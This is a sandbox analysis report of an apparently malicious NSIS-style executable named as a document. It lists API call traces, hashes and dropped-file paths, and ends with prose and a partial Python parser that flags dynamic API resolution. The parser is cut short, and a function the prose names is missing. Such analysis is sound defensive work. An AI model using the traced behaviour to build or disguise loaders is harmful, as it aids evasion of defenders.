• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
• Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
• Opcode Fuzzy Hash: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
• Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
• GetDlgItem.USER32(?,000003E8), ref: 0040447F
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
• GetSysColor.USER32(?), ref: 004044AD
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
• lstrlenW.KERNEL32(?), ref: 004044CE
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
• GetDlgItem.USER32(?,0000040A), ref: 00404549
• SendMessageW.USER32(00000000), ref: 00404550
• GetDlgItem.USER32(?,000003E8), ref: 0040457B
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
• LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
• SetCursor.USER32(00000000), ref: 004045CF
• LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
• SetCursor.USER32(00000000), ref: 004045EB
• SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                    • String ID: Call$DC@$N
                                                                                                                                                    • API String ID: 3103080414-3199507676
                                                                                                                                                    • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                    • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                                                                                    • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                    • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                    • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                    • String ID: F
                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                    • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                    • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                                                                                    • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                    • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                                                                                    • wsprintfA.USER32 ref: 00405F62
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                                                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                                                                                                      • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                      • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                                    • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                                    • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                                                                                    • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                                    • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                                                                                    APIs
                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                    • API String ID: 589700163-2595587113
                                                                                                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                    • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                    • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404292
• GetSysColor.USER32(00000000), ref: 004042D0
• SetTextColor.GDI32(?,00000000), ref: 004042DC
• SetBkMode.GDI32(?,?), ref: 004042E8
• GetSysColor.USER32(?), ref: 004042FB
• SetBkColor.GDI32(?,?), ref: 0040430B
• DeleteObject.GDI32(?), ref: 00404325
• CreateBrushIndirect.GDI32(?), ref: 0040432F
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
  • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
APIs
• lstrlenW.KERNEL32(007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
• lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
• lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,762323A0), ref: 0040535A
• SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
• SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
• GetMessagePos.USER32 ref: 00404BEC
• ScreenToClient.USER32(?,?), ref: 00404C06
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
APIs
• GetDC.USER32(?), ref: 00401DBC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
• MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
• ReleaseDC.USER32(?,00000000), ref: 00401DEF
• CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                    • String ID: Tahoma
                                                                                                                                                    • API String ID: 3808545654-3580928618
                                                                                                                                                    • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                                    • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                                                                                    • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                                    • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                    • MulDiv.KERNEL32(0008A76C,00000064,0008A770), ref: 00402E3C
                                                                                                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                    Strings
                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                    • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                    • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                                                                                    • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                    • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E9B121B: GlobalAlloc.KERNELBASE(00000040,?,6E9B123B,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B1225
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6E9B265B
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B2690
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                    • Opcode ID: 19c859219f60fd53457f160ab4b182b55351e8451b6bb8efc9ce804dfd21718a
                                                                                                                                                    • Instruction ID: 05e3f7cef9edbcc7956439e18795972bc31495ec003c335b0f39c84c7435a498
                                                                                                                                                    • Opcode Fuzzy Hash: 19c859219f60fd53457f160ab4b182b55351e8451b6bb8efc9ce804dfd21718a
                                                                                                                                                    • Instruction Fuzzy Hash: E3319CB1918501EFCB15CFA8C898C6BBBBEEF9B308710492EF55187220E771D8159F25
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                    • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                                    • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                                                                                    • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                                    • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                                                                                    APIs
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
• API ID: ByteCharMultiWidelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp$C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll
• API String ID: 3109718747-1633066113
• Opcode ID: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
• Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
• Opcode Fuzzy Hash: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
• Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
APIs
Memory Dump Source
• Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
• Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: 86a42715d581dd2618a3822b7be8c190e3796e442de30ad97d47c658b4801efa
• Instruction ID: d9200f89b4b60b30db2316c2f2c6ddc7779ed3c3c3a6d81c93a0bd710b1c4e20
• Opcode Fuzzy Hash: 86a42715d581dd2618a3822b7be8c190e3796e442de30ad97d47c658b4801efa
• Instruction Fuzzy Hash: BE51B132D1415ABB8B409FEB84845AFBABDEF87354B104A6AD410E3144D7B0FAC98F91
APIs
• GlobalFree.KERNEL32(00000000), ref: 6E9B24DA
  • Part of subcall function 6E9B122C: lstrcpynW.KERNEL32(00000000,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B123C
• GlobalAlloc.KERNEL32(00000040), ref: 6E9B2460
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E9B247B
Memory Dump Source
• Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
• Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
Similarity
• API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
• String ID:
• API String ID: 4216380887-0
• Opcode ID: 0a8690227c30689cc096dd70265e469136aa73573eefc256aa48c5c85856e9e2
• Instruction ID: cd472a0b2eaec2e3e7f1a7c7f5d9ac9a35b025742189d03f2547b087b4cabcb5
• Opcode Fuzzy Hash: 0a8690227c30689cc096dd70265e469136aa73573eefc256aa48c5c85856e9e2
• Instruction Fuzzy Hash: D441AAB0408705EFD714DFA6D844A6B77BDEF96714B00491DE946CBA80EB70E889CFA1
APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1639
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1640
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1654
• GetProcAddress.KERNEL32(6E9B21F0,00000000), ref: 6E9B165B
• GlobalFree.KERNEL32(00000000), ref: 6E9B1664
Memory Dump Source
• Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
• Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
Similarity
• API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
• String ID:
• API String ID: 1148316912-0
• Opcode ID: d23ca7fa27f7e4b64cac69f55150a959310bc0c86dfd521bb9f3063d505455b4
• Instruction ID: 40249aae6d1250208a1ab7ab97c0a04f9bc565d328a9e4db45fa64f1e76fe95e
• Opcode Fuzzy Hash: d23ca7fa27f7e4b64cac69f55150a959310bc0c86dfd521bb9f3063d505455b4
• Instruction Fuzzy Hash: B3F0ACB260A5387BDA2196B78C4CC9BBE9CDF8B6F5B110215F6289219086A19D01DBF1
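The five-call list for the function at 6E9B1639 to 6E9B1664 above (WideCharToMultiByte, GlobalAlloc, WideCharToMultiByte, GetProcAddress, GlobalFree) is a wide-string name converted into a freshly allocated ANSI buffer and then looked up with GetProcAddress; this is the kind of listing behind the report's "Contains functionality to dynamically determine API calls" signature. The module is the System.dll dropped under nse865B.tmp (see the String ID further up), which is consistent with the NSIS System plugin resolving an export by name; that attribution is an inference from the path, not something the report states. Because the listing records lpProcName as 00000000, the resolved export is not visible here and has to come from the memory dump or an API hook. The Python below is an added example, not code from the Joe Sandbox report or its tooling: it parses lines in the report's "APIs" format (bullet, Api.MODULE(args), ref: address, plus nested "Part of subcall function" lines) and flags that subsequence. The sample texts are copied from the blocks on this page; parse_api_list, find_dynamic_resolution and the returned tuple shape are my own.

```python
"""Parse Joe Sandbox 'APIs' listings and flag the name-to-GetProcAddress pattern."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One line of a function block's "APIs" list, e.g.
#   • GetProcAddress.KERNEL32(6E9B21F0,00000000), ref: 6E9B165B
# Nested lines read "Part of subcall function <addr>: <call>". The bullet is
# optional so text pasted without it still parses.
_CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?"
    r"\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)


@dataclass
class ApiCall:
    api: str                    # "GetProcAddress"
    module: str                 # "KERNEL32"
    args: List[Optional[int]]   # recovered stack args; None for "?" or strings
    ref: Optional[int]          # call-site address
    subcall_of: Optional[int]   # set for "Part of subcall function" lines


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)     # also accepts negatives such as "-000000A0"
    except ValueError:
        return None             # paths and format strings are left opaque


def parse_api_list(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue            # headers such as "Strings" or "Memory Dump Source"
        raw = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("module"),
            args=[_parse_arg(a) for a in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16) if m.group("ref") else None,
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


# Wide name -> ANSI buffer -> export lookup -> free: what the 6E9B1639 block shows.
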